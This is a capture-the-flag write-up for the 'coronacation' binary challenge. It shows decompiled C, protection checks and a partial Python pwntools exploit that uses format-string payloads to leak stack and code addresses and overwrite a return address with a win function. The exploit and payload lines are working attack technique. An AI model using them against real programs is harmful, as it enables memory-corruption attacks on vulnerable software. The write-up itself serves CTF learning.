Tags: binary-exploitation format-string pwn fms
NOTE: To solve this challenge i worked with my teammate Enrico. He wrote the exploit (python 2) first and got the flag.
In my writeup i put an optimized exploit for python 3.
Play game:
__int64 play_game()
__int64 result; // rax
char s; // [rsp+0h] [rbp-40h]
puts("Welcome to this choose your own adventure game!");
puts("You're President Ronald Drump and are tasked with leading the nation through this crisis.");
puts("So what do you want to do?");
puts("1. Close the borders.");
puts("2. Tell everyone not to panic. It's just the Fake News media freaking out.");
fgets(&s, 50, _bss_start);
printf("You chose: ", 50LL);
if ( s == 49 )
return close_borders();
result = 50 - (unsigned int)(unsigned __int8)s;
if ( s == 50 )
result = no_panic();
return result;
`Close borders` and `no panic` functions contains the same instruction, i used close borders.
Close borders:
__int64 close_borders()
__int64 result; // rax
char s; // [rsp+0h] [rbp-40h]
puts("\nSo we closed our borders. Weren't we doing that anyway with the wall?");
puts("It's still spreading within our borders what do we do now?");
puts("1. Reassure everyone the country can handle this. Our healthcare system is the best. Just the greatest.");
puts("2. Make it a national emergency. Show the people we don't need Bernie's healthcare plan.");
fgets(&s, 50, _bss_start);
printf("You chose: ", 50LL);
if ( s == 49 )
return lose3();
result = 50 - (unsigned int)(unsigned __int8)s;
if ( s == 50 )
result = lose4();
return result;
[*] '/home/marco/Desktop/umbccd/coronacation/coronacation'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
In order to call win function, we need two memory leak to bypass PIE / ASLR.
We used te first format string (play game function) to leak the rbp (stack section leak) and return address(.text section address).
Then with the second format string (in `close_border`), we overwrite the return address with win address.
from pwn import *
#p = remote('ctf.umbccd.io', 4300)
p = process('./coronacation')
payload = (('1 ').encode())
payload += (('%14$p %15$p').encode())
print(p.recvuntil('chose: 1 ').decode())
stm = p.recvuntil('\n').decode()
rbp = int(stm.replace('\n', "").split(' ')[0], 16)
ret_stack = rbp-0x8
ret = int(stm.replace('\n', "").split(' ')[1], 16)
win = ret-0x31f
towrite = win & 0xffff
print('to write: ', (towrite))
print('Leaked base pointer: ', hex(rbp), 'stack address return pointer: ', hex(ret_stack))
print('leaked return address: ', hex(ret), ' win function at: ', hex(win))
padding = '0'*(8-len(str(towrite))) + str(towrite)
payload2 = ("%" + padding + "lx%8$hn").encode()
payload2 += p64(ret_stack)